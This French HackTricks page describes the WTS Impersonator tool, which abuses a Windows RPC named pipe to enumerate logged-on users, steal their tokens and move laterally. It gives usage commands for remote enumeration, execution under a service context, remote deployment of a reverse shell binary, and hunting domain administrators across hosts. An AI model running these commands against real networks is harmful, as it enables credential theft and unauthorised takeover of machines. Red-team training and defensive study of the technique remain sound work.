WTS Impersonator

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Le WTS Impersonator outil exploite le "\pipe\LSM_API_service" RPC Named pipe pour discrètement énumérer les utilisateurs connectés et usurper leurs jetons, contournant les techniques traditionnelles d'usurpation de jetons. Cette approche facilite les mouvements latéraux transparents au sein des réseaux. L'innovation derrière cette technique est attribuée à Omri Baso, dont le travail est accessible sur GitHub.

Fonctionnalité principale

L'outil fonctionne à travers une séquence d'appels API :

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Modules Clés et Utilisation

  • Énumération des Utilisateurs: L'énumération des utilisateurs locaux et distants est possible avec l'outil, en utilisant des commandes pour chaque scénario :

  • Localement :

.\WTSImpersonator.exe -m enum
  • À distance, en spécifiant une adresse IP ou un nom d'hôte :

.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • Exécution de Commandes: Les modules exec et exec-remote nécessitent un contexte de Service pour fonctionner. L'exécution locale nécessite simplement l'exécutable WTSImpersonator et une commande :

  • Exemple d'exécution de commande locale :

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • PsExec64.exe peut être utilisé pour obtenir un contexte de service :

.\PsExec64.exe -accepteula -s cmd.exe
  • Exécution de Commande à Distance: Implique la création et l'installation d'un service à distance similaire à PsExec.exe, permettant l'exécution avec les autorisations appropriées.

  • Exemple d'exécution à distance :

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • Module de Recherche d'Utilisateur: Cible des utilisateurs spécifiques sur plusieurs machines, exécutant du code sous leurs identifiants. Cela est particulièrement utile pour cibler les administrateurs de domaine avec des droits d'administration locaux sur plusieurs systèmes.

  • Exemple d'utilisation :

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe

Dernière mise à jour